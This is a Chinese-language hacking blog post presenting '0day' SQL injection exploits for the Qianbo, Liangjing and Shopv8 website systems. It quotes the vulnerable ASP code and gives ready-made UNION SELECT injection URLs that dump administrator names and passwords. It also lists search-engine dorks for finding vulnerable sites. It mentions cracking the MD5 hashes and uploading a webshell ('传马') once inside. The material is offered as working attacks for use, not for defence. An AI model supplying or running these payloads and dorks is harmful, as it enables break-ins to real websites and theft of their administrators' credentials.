Alxston Blog ｜小童De部落

千博企业网站管理系统 Oday

在HitCount.asp这个文件里发现，文件没有调用防注入代码

<%
Dim rs, m_SQL
Dim m_ID
m_ID = ReplaceBadChar(Request.QueryString(“id”))
m_LX = ReplaceBadChar(Request.QueryString(“LX”))
action = ReplaceBadChar(Request.QueryString(“action”))
If action = ”count” Then
conn.Execute(“update ”&m_LX&” set ClickNumber = ClickNumber + 1 where ID=” & m_ID & ”")
Else
m_SQL = ”select ClickNumber from ”&m_LX&” where ID=” & m_ID
Set rs = conn.Execute(m_SQL)
response.Write ”document.write(“&rs(0)&”);”
rs.Close
Set rs = Nothing
End If
%>

就是这个文件了。我们来构造注入语句
如下：
http://127.0.0.1/hitcount.asp?lx=Qianbo_about&id=1%20and%201=2%20union%20select%20password%20from%20qianbo_admin   获取管理密码

http://127.0.0.1/hitcount.asp?lx=Qianbo_about&id=1%20and%201=2%20union%20select%20adminname%20from%20qianbo_admin
获取管理帐号

关键字:
inurl:Search.asp?Range=Product&Keyword=
inurl:ProductBuy.asp?ProductNo=

经过MD5的密码破解顺利进入网站后台程序，接下来传马我就不多说了！

看图：

良精所有产品通杀 0day

关键字：

inurl:Search.asp?Range=Product&Keyword=
inurl:ProductBuy.asp?ProductNo=
inurl: (ProductShow.asp?ID=)

爆用户：

http://127.0.0.1/hitcount.asp?lx=LiangJingCMS_DownSort&id=1%20and%201=2%20union%20select%20adminname%20from%20LiangjingCMS_admin

如果不行 试试下面的

引用
http://127.0.0.1/hitcount.asp?lx=LiangJing_DownSort&id=1%20and%201=2%20union%20select%20adminname%20from%20Liangjing_admin

爆密码：

http://127.0.0.1/hitcount.asp?lx=LiangJingCMS_DownSort&id=1%20and%201=2%20union%20select%20password%20from%20LiangjingCMS_admin

如果不行 试试下面的

引用
http://127.0.0.1/hitcount.asp?lx=LiangJing_DownSort&id=1%20and%201=2%20union%20select%20password%20from%20Liangjing_admin

Shopv8商城系统 v10.48 0day漏洞

影响版本： Shopv8商城系统 v10.48
漏洞描述： pinglun.asp页面存在SQL注入
Author:Lan3a

转载请注明出处：http://blog.cfyhack.cn/

前台所有程序都加了防注入代码的，所以我就不去看了。

直接翻后台的看，先看有没有不需要验证的，运气很不错，找到了。

pinglun.asp这个文件。

代码如下：

<%dim bookid,action
pinglunid=request.QueryString(“id”)     直接提交
action=request.QueryString(“action”)
if action=”save” then
set rs=server.CreateObject(“adodb.recordset”)
rs.open ”select * from shop_pinglun where pinglunid=”&pinglunid,conn,1,3
rs(“huifu”)=HTMLEncode2(trim(request(“huifu”)))
rs(“huifudate”)=now()
rs.update
rs.close
set rs=nothing
response.write ”<script language=javascript>alert(’您的回复已成功提交！！’);history.go(-1);</script>”
response.End
end if
%>
<table class=”tableBorder” width=”90%” border=”0″ align=”center” cellpadding=”0″ cellspacing=”1″ bgcolor=”#FFFFFF”>
<tr>
<td align=”center” background=”../images/admin_bg_1.gif”><b><font color=”#ffffff”>发表评论</font></b></td>
</tr>
<tr>
<form name=”pinglunform” method=”post” action=”pinglun.asp?action=save&id=<%=pinglunid%>”>
<td >
<%set rs=server.CreateObject(“adodb.recordset”)
rs.open ”select * from shop_pinglun where pinglunid=”&pinglunid,conn,1,3   直接传入查询
%>

下面直接贴 利用方法了：
http://localhost/admin/pinglun.asp?id=1%20and%2201=2%20union%20select%201,2,3,4,username,password,7,8,9,10,11%20from%20admin